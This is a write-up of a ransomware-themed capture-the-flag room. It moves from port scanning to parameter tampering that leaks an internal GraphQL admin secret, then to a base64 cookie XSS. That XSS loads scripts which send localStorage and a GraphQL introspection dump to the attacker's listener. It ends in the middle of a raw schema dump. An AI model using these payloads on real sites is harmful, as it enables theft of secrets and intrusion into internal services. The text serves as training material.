Skip to content

Latest commit

 

History

History
811 lines (645 loc) · 159 KB

Carpe Diem 1.md

File metadata and controls

811 lines (645 loc) · 159 KB

Recover your clients encrypted files before the ransomware timer runs out!

Task 1  Pay...back!

 Start Machine

One of your clients has been hacked by the Carpe Diem cyber gang and all their important files have been encrypted. They have hired you to help them recover an important file that they need to restore their backups. They have contacted the carpe diem cybergang and paid a ransom but have not heard anything back.

The countdown timer is ticking since they visited and they are now running out of time to recover their data before the keys are deleted on the server. Can you retrieve the keys and help your client restore their data before time runs out?

The file is available to download on the machine: /downloads/Database.carp
(The downloads-section is not a part of the challenge)

Answer the questions below

┌──(witty㉿kali)-[~/Downloads/sudo_inject]
└─$ rustscan -a 10.10.77.135 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.77.135:80
Open 10.10.77.135:111
Open 10.10.77.135:40346
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-11 13:01 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:01
Completed Parallel DNS resolution of 1 host. at 13:01, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:01
Scanning 10.10.77.135 [3 ports]
Discovered open port 111/tcp on 10.10.77.135
Discovered open port 40346/tcp on 10.10.77.135
Discovered open port 80/tcp on 10.10.77.135
Completed Connect Scan at 13:01, 0.18s elapsed (3 total ports)
Initiating Service scan at 13:01
Scanning 3 services on 10.10.77.135
Completed Service scan at 13:01, 14.42s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.77.135.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 3.63s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.88s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
Nmap scan report for 10.10.77.135
Host is up, received user-set (0.18s latency).
Scanned at 2023-07-11 13:01:20 EDT for 21s

PORT      STATE SERVICE REASON  VERSION
80/tcp    open  http    syn-ack nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Home
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36716/tcp6  status
|   100024  1          40346/tcp   status
|   100024  1          59030/udp   status
|_  100024  1          60395/udp6  status
40346/tcp open  status  syn-ack 1 (RPC #100024)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:01
Completed NSE at 13:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds

Carpe Diem
All your data are belong to us!

   uu$:$:$:$:$:$uu
    uu$$$$$$$$$$$$$$$$$uu
   u$$$$$$$$$$$$$$$$$$$$$u
   u$$$$$$$$$$$$$$$$$$$$$$$u
   u$$$$$$$$$$$$$$$$$$$$$$$$$u
  u$$$$$$$$$$$$$$$$$$$$$$$$$u
  u$$$$$$*   *$$$*   *$$$$$$u
  $$$$*      u$u       $$$$*
  $$$u       u$u       u$$$
  $$$u      u$$$u      u$$$
  *$$$$uu$$$   $$$uu$$$$*
  *$$$$$$$*   *$$$$$$$*
   u$$$$$$$u$$$$$$$u
   u$*$*$*$*$*$*$u
  uuu        $$u$ $ $ $ $u$$       uuu
 u$$$$        $$u$u$u$u$u$$       u$$$$
  $$$$$uu      *$$$$$$$$$*     uu$$$$$$
u$$$$$$$$$$$      *****    uuuu$$$$$$$$$
$$$$***$$$$$$$$$$uuu   uu$$$$$$$$$***$$$*
 ***      **$$$$$$$$$$$uu **$***
          uuuu **$$$$$$$$$$uuu
 u$$$uuu$$$$$$$$$uu **$$$$$$$$$$$uuu$$$
 $$$$$$$$$$****           **$$$$$$$$$$$*
   *$$$$$*                      **$$$$** 

Your key will be deleted:
Wed Jul 12 2023 01:01:30 GMT+0000
0d 11h 58m 32s
BTC:	bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj

Proof:	bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj	

Hey! 

stupid is as stupid does...

OPTIONS /proof/ HTTP/1.1

Host: c4rp3d13m.net

┌──(witty㉿kali)-[~/Downloads/seasurfer]
└─$ tac /etc/hosts                                                  
10.10.77.135 c4rp3d13m.net

http://c4rp3d13m.net/downloads/

┌──(witty㉿kali)-[~/Downloads]
└─$ file decrypt_linux_amd64 
decrypt_linux_amd64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=Q-qwIhmYLL9O7nxtkSFl/ALutoQld-L8sj0x8TtDr/APPpThdSM2NmXJG6XglT/CwEqr2HOjAvrporc6crE, not stripped

</pre><h4></h4><h2>Your key will be deleted:</h2><h3>Wed Jul 12 2023 01:01:30 GMT+0000</h3><div id="counter"></div><script>function aaa(wallet) {
  var wallet = wallet;
  if (wallet.trim() === 'bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj'){
    alert('Hey! \n\nstupid is as stupid does...');
    return;
  }

var re = new RegExp("^([a-z0-9]{42,42})$");
if (re.test(wallet.trim())) {
  var http = new XMLHttpRequest();
  var url = 'http://c4rp3d13m.net/proof/';
  http.open('POST', url, true);
  http.setRequestHeader('Content-type', 'application/json');
  var d = '{"size":42,"proof":"'+wallet+'"}';
  http.onreadystatechange = function() {
  if(http.readyState == 4 && http.status == 200) {
    //alert(http.responseText);
    }
    }
      http.send(d);
    } else {
    alert('Invalid wallet!');
    }
    }
</script><script>function clippy() {
var copyText = document.getElementById("pay");
copyText.select();
copyText.setSelectionRange(0, 99999)
document.execCommand("copy");
alert("Copied: " + copyText.value);
}</script><script>// Set the date we're counting down to
var countdown = document.cookie
var countdown = countdown.replace(/%3A/g, ":");
var countdown = countdown.replace("countdown=", "");

var countDownDate = new Date(countdown);
countDownDate.setHours(countDownDate.getHours() + 8);
countDownDate = new Date(countDownDate).getTime();

// Update the count down every 1 second
var x = setInterval(function() {

 // Get today's date and time
var now = new Date().getTime();

// Find the distance between now and the count down date
var distance = countDownDate - now;

// Time calculations for days, hours, minutes and seconds
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);

// Output the result in an element with id="demo"
document.getElementById("counter").innerHTML = days + "d " + hours + "h "+ minutes + "m " + seconds + "s ";

// If the count down is over, write some text
if (distance < 0) {
clearInterval(x);
document.getElementById("counter").innerHTML = "KEY DELETED. YOU SHOULD HAVE PAYED!";
}
}, 1000);
</script>


POST /proof/ HTTP/1.1

Host: c4rp3d13m.net

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: session=MTAuOC4xOS4xMDM%3D; countdown=2023-07-11T17%3A01%3A30.809939

Upgrade-Insecure-Requests: 1

Content-Type: application/json

Content-Length: 64



{"size":42,"proof":"bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj"}


HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Tue, 11 Jul 2023 17:15:49 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 10

Connection: close

X-Powered-By: Express

ETag: W/"a-hEe8OvkEep9LUrtsayAyx5Brl0I"

Last-Modified: Tuesday, 11-Jul-2023 17:15:49 GMT

Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0



Really?...

XMLHttpRequest, también referida como XMLHTTP, es una interfaz empleada para realizar peticiones HTTP y HTTPS a servidores Web. Para los datos transferidos se usa cualquier codificación basada en texto, incluyendo: texto plano, XML, JSON, HTML y codificaciones particulares específicas.

## Parameter Tampering  overflow

{"size":400,"proof":"bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hjaaaaaaaaaaaaaaaaaaaaaaaaaa"}

({ headers: {'content-type' : 'application/json','x-hasura-admin-secret' : 's3cr3754uc35432' error connecting to http://192.168.150.10/v1/graphql/

leak information

1. Internal ip adress
2. The fact that there is a GraphQL API
3. The Admin authentication secret pass for GraphQL API

## Cookies injection

Cookie: session=MTAuOC4xOS4xMDM%3D; countdown=2023-07-11T17%3A01%3A30.809939

https://es.wikipedia.org/wiki/C%C3%B3digo_porciento

MTAuOC4xOS4xMDM=  10.8.19.103 our ip

<script src='http://10.8.19.103:1234/exploit.js'></script>

PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC44LjE5LjEwMzoxMjM0L2V4cGxvaXQuanMnPjwvc2NyaXB0Pg==

so

PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC44LjE5LjEwMzoxMjM0L2V4cGxvaXQuanMnPjwvc2NyaXB0Pg

https://labs.withsecure.com/publications/getting-real-with-xss

┌──(witty㉿kali)-[~/Downloads]
└─$ cat exploit.js
var xhr=new XMLHttpRequest();
xhr.open('GET','http://10.8.19.103:1234/?q='+JSON.stringify(localStorage));
xhr.send();


┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234                                           
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...

GET / HTTP/1.1

Host: c4rp3d13m.net

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: session=PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC44LjE5LjEwMzoxMjM0L2V4cGxvaXQuanMnPjwvc2NyaXB0Pg; countdown=undefined

Upgrade-Insecure-Requests: 1





┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.77.135 - - [11/Jul/2023 14:13:01] "GET /exploit.js HTTP/1.1" 200 -
10.10.77.135 - - [11/Jul/2023 14:13:02] "GET /?q=%7B%22secret%22:%22s3cr3754uc35432%22,%22flag1%22:%22THM%7BSo_Far_So_Good_So_What%7D%22%7D HTTP/1.1" 200 -

decode as url

{"secret":"s3cr3754uc35432","flag1":"THM{So_Far_So_Good_So_What}"}

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection#enumerate-database-schema-via-introspection

┌──(witty㉿kali)-[~/Downloads]
└─$ cat graph_ql.js
var xhr = new XMLHttpRequest();
var q = '{"query": "fragment FullType on __Type {  kind  name  description  fields(includeDeprecated: true) {    name    description    args {      ...InputValue    }    type {      ...TypeRef    }    isDeprecated    deprecationReason  }  inputFields {    ...InputValue  }  interfaces {    ...TypeRef  }  enumValues(includeDeprecated: true) {    name    description    isDeprecated    deprecationReason  }  possibleTypes {    ...TypeRef  }}fragment InputValue on __InputValue {  name  description  type {    ...TypeRef  }  defaultValue}fragment TypeRef on __Type {  kind  name  ofType {    kind    name    ofType {      kind      name      ofType {        kind        name        ofType {          kind          name          ofType {            kind            name            ofType {              kind              name              ofType {                kind                name              }            }          }        }      }    }  }}query IntrospectionQuery {  __schema {    queryType {      name    }    mutationType {      name    }    types {      ...FullType    }    directives {      name      description      locations      args {        ...InputValue      }    }  }}"}';
// xhr.setRequestHeader('Content-Type', 'application/json');
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret','s3cr3754uc35432');

xhr.onreadystatechange=function() {
    if (this.readyState === 4) {
        var r = new XMLHttpRequest();
        r.open('GET','http://10.8.19.103:1234/?data='+btoa(this.responseText),false);
        r.send();
    }
}

xhr.send(q);

<script src='http://10.8.19.103:1234/graph_ql.js'></script>

PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC44LjE5LjEwMzoxMjM0L2dyYXBoX3FsLmpzJz48L3NjcmlwdD4



┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.77.135 - - [11/Jul/2023 14:37:42] "GET /exploit.js HTTP/1.1" 200 -
10.10.77.135 - - [11/Jul/2023 14:37:42] "GET /graph_ql.js HTTP/1.1" 200 -
10.10.77.135 - - [11/Jul/2023 14:37:43] "GET /?q=%7B%22secret%22:%22s3cr3754uc35432%22,%22flag1%22:%22THM%7BSo_Far_So_Good_So_W
10.10.77.135 - - [11/Jul/2023 14:45:56] "GET /?data= HTTP/1.1" 200 -


https://apis.guru/graphql-voyager/

decoded the exfiltrated data, pass it to [Graphql voyager](https://apis.guru/graphql-voyager/), so we can visually explore our GraphQL API in an interactive graph (go to introspection)

{"data":{"__schema":{"directives":[{"args":[{"name":"if","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"description":null}],"name":"include","locations":["FIELD","FRAGMENT_SPREAD","INLINE_FRAGMENT"],"description":null},{"args":[{"name":"if","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"description":null}],"name":"skip","locations":["FIELD","FRAGMENT_SPREAD","INLINE_FRAGMENT"],"description":null}],"queryType":{"name":"query_root"},"types":[{"inputFields":null,"kind":"SCALAR","possibleTypes":null,"interfaces":null,"name":"Boolean","enumValues":null,"description":null,"fields":null},{"inputFields":null,"kind":"SCALAR","possibleTypes":null,"interfaces":null,"name":"Float","enumValues":null,"description":null,"fields":null},{"inputFields":null,"kind":"SCALAR","possibleTypes":null,"interfaces":null,"name":"ID","enumValues":null,"description":null,"fields":null},{"inputFields":null,"kind":"SCALAR","possibleTypes":null,"interfaces":null,"name":"Int","enumValues":null,"description":null,"fields":null},{"inputFields":[{"name":"_eq","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"_gt","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"_gte","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"_in","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}}},"description":null},{"name":"_is_null","defaultValue":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"description":null},{"name":"_lt","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"_lte","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"_neq","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"_nin","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}}},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"Int_comparison_exp","enumValues":null,"description":"expression to compare columns of type Int. All fields are combined with logical 'AND'.","fields":null},{"inputFields":null,"kind":"SCALAR","possibleTypes":null,"interfaces":null,"name":"String","enumValues":null,"description":null,"fields":null},{"inputFields":[{"name":"_eq","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_gt","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_gte","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_ilike","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_in","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}}},"description":null},{"name":"_is_null","defaultValue":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"description":null},{"name":"_like","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_lt","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_lte","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_neq","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_nilike","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_nin","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}}},"description":null},{"name":"_nlike","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_nsimilar","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"_similar","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"String_comparison_exp","enumValues":null,"description":"expression to compare columns of type String. All fields are combined with logical 'AND'.","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"__Directive","enumValues":null,"description":null,"fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"args","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__InputValue","ofType":null}}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"description","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"locations","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"__DirectiveLocation","ofType":null}}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"description":null}]},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"__DirectiveLocation","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"ARGUMENT_DEFINITION","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"ENUM","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"ENUM_VALUE","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"FIELD","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"FIELD_DEFINITION","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"FRAGMENT_DEFINITION","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"FRAGMENT_SPREAD","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"INLINE_FRAGMENT","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"INPUT_FIELD_DEFINITION","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"INPUT_OBJECT","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"INTERFACE","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"MUTATION","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"OBJECT","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"QUERY","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"SCALAR","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"SCHEMA","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"SUBSCRIPTION","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"UNION","description":null}],"description":null,"fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"__EnumValue","enumValues":null,"description":null,"fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"deprecationReason","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"description","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"isDeprecated","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"description":null}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"__Field","enumValues":null,"description":null,"fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"args","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__InputValue","ofType":null}}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"deprecationReason","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"description","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"isDeprecated","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"type","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}},"description":null}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"__InputValue","enumValues":null,"description":null,"fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"defaultValue","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"description","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"type","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}},"description":null}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"__Schema","enumValues":null,"description":null,"fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"directives","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Directive","ofType":null}}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"mutationType","type":{"kind":"OBJECT","name":"__Type","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"queryType","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"subscriptionType","type":{"kind":"OBJECT","name":"__Type","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"types","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}}}},"description":null}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"__Type","enumValues":null,"description":null,"fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"description","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[{"name":"includeDeprecated","defaultValue":"false","type":{"kind":"SCALAR","name":"Boolean","ofType":null},"description":null}],"isDeprecated":false,"deprecationReason":null,"name":"enumValues","type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__EnumValue","ofType":null}}},"description":null},{"args":[{"name":"includeDeprecated","defaultValue":"false","type":{"kind":"SCALAR","name":"Boolean","ofType":null},"description":null}],"isDeprecated":false,"deprecationReason":null,"name":"fields","type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Field","ofType":null}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"inputFields","type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__InputValue","ofType":null}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"interfaces","type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"kind","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"__TypeKind","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"ofType","type":{"kind":"OBJECT","name":"__Type","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"possibleTypes","type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}}},"description":null}]},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"__TypeKind","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"ENUM","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"INPUT_OBJECT","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"INTERFACE","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"LIST","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"NON_NULL","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"OBJECT","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"SCALAR","description":null},{"isDeprecated":false,"deprecationReason":null,"name":"UNION","description":null}],"description":null,"fields":null},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"conflict_action","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"ignore","description":"ignore the insert on this row"},{"isDeprecated":false,"deprecationReason":null,"name":"update","description":"update the row with the given values"}],"description":"conflict action","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"mutation_root","enumValues":null,"description":"mutation root","fields":[{"args":[{"name":"where","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null}},"description":"filter the rows which have to be deleted"}],"isDeprecated":false,"deprecationReason":null,"name":"delete_victims","type":{"kind":"OBJECT","name":"victims_mutation_response","ofType":null},"description":"delete data from the table: \"victims\""},{"args":[{"name":"objects","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_insert_input","ofType":null}}}},"description":"the rows to be inserted"},{"name":"on_conflict","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_on_conflict","ofType":null},"description":"on conflict condition"}],"isDeprecated":false,"deprecationReason":null,"name":"insert_victims","type":{"kind":"OBJECT","name":"victims_mutation_response","ofType":null},"description":"insert data into the table: \"victims\""},{"args":[{"name":"_inc","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_inc_input","ofType":null},"description":"increments the integer columns with given value of the filtered values"},{"name":"_set","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_set_input","ofType":null},"description":"sets the columns of the filtered rows to the given 